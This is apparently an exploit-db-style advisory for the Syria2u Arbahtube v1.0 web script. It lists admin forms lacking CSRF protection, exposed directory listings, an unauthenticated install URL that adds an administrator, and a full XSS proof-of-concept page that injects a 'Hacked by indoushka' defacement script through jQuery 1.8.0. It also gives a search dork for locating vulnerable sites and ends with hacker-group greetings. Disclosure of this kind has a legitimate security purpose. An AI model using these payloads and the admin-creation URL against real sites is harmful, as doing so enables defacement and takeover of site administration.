| # Title    : Syria2u Arbahtube v1.0 Mullti Vulnerability   
| # Author   : indoushka                                                               
| # email    : indoushka4ever@gmail.com                                                                                                                                                                 
| # Dork     : Copyright ©2014 script syria2u version1. All Rights Reserved.
| # Tested on: win8.1 Fr V.(Pro)  15:39 * 22/05/2015  
| # Bug      : Mullti
| # Download : http://www.syria2u.com/
=======================================

HTML form without CSRF protection :

http://127.0.0.1/Syria2u/Admin/system/addImage.php

http://127.0.0.1/Syria2u/Admin/system/addVideo.php

http://127.0.0.1/Syria2u/Admin/system/cckAddEdit.php

Directory listing :

http://127.0.0.1//Syria2u/admin/editor/

http://127.0.0.1//Syria2u/files/

http://127.0.0.1//Syria2u/admin/cck/

http://127.0.0.1/Syria2u/admin/system/

XSS - jQuery v1.8.0 EXploits :

<html>
<head>
  <meta charset="utf-8">
  <title>XSS - jQuery v1.8.0 </title>
  <script src="http://127.0.0.1/Syria2u/admin/js/jquery-1.8.0.min.js"></script>
  <script>
    $(function() {
      $('#users').each(function() {
        var select = $(this);
        var option = select.children('option').first();
        select.after(option.text());
        select.hide();
      });
    });
  </script>
</head>
 
 
<body>
  <form method="post">
    <p>
      <select id="users" name="users">
        <option value="xssreflected"><script><marquee><font color=lime size=32>Hacked by indoushka</font></marquee>
reflected - jQuery v1.11.1 by - indoushka thnx to 
@firebitsbr - mauro.risonho@gmail.com&#x27;);</script></option>
      </select>
    </p>
  </form>
</body>
</html>

Add Admin :

http://127.0.0.1/Syria2u/install/index.php?install=3

Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
Greetz : 
Exploit-db Team : 
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * www.sa-hacker.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
---------------------------------------------------------------------------------------------------------------